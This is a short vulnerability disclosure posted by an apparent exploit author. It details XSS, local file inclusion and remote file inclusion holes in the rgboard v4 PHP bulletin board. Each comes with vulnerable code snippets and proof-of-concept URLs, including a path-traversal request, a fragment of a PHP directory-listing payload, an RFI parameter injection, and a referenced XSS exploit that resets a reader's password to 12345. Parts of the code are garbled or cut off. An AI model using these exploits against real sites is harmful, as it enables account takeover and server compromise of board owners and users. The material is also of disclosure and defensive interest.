rgboard v4 5p1 (07.07.27) Multiple Vulnerability bY make0day@gmail.com /************************* rgboard (VERSION v4 (07.07.27))is widely used bulletin board system of Korea. It is freely available for all platforms that supports PHP and MySQL. But I find a XSS vuln ,LFI vuln and RFI vuln. I attached a exploit that makes password = 12345 (who reads xss post). Here is the details: **************************/ TEST ON VERSION rgboard v4 (07.07.27) Download : http://v4.rgboard.com/ /*************************** XSS Vulnerability /wrtie.php ... $bd_content = rg_conv_text($bd_content,$bd_html); //You have to check 'html use'. *************************/ poc: Inject XSS tag : Hi there! :) /rghunter.php - Makes password as 12345
/*************************** Local File Inclusion Vulnerability /_footer.php if(file_exists($skin_path."footer.php")) include($skin_path."footer.php"); //File inclusion *************************/ poc: //yeah, there is a problem.. file_exists()! //How can we bypass it? I don`t know :) //If we have account in same server with target, we can attack his board easily //Here is the example : http://attacker.com/RGboard/rg4_board/_footer.php?skin_path=../../../../../../tmp/ /tmp/footer.php handle . "\n"; echo "Path: " . $d->path . "\n"; while (false !== ($entry = $d->read())) { echo $entry."\n"; } $d->close(); ?> //Yeah, It is good, But when we don`t account in that server, How we can beat target? //We can find a clue from php.net //On windows, use //computername/share/filename or \\computername\share\filename to check files on network shares. //As of PHP 5.0.0, this function can also be used with some URL wrappers. Refer to List of Supported Protocols/Wrappers //for a listing of which wrappers support stat() family of functionality. //Do you find clue too? :-O /*************************** Remote File Inclusion Vulnerability /footer.php ... include($_path['counter']."rg_counter.php"); ?> //File inclusion *************************/ poc: http://test.com/RGboard/include/footer.php?_path[counter]=[RFI]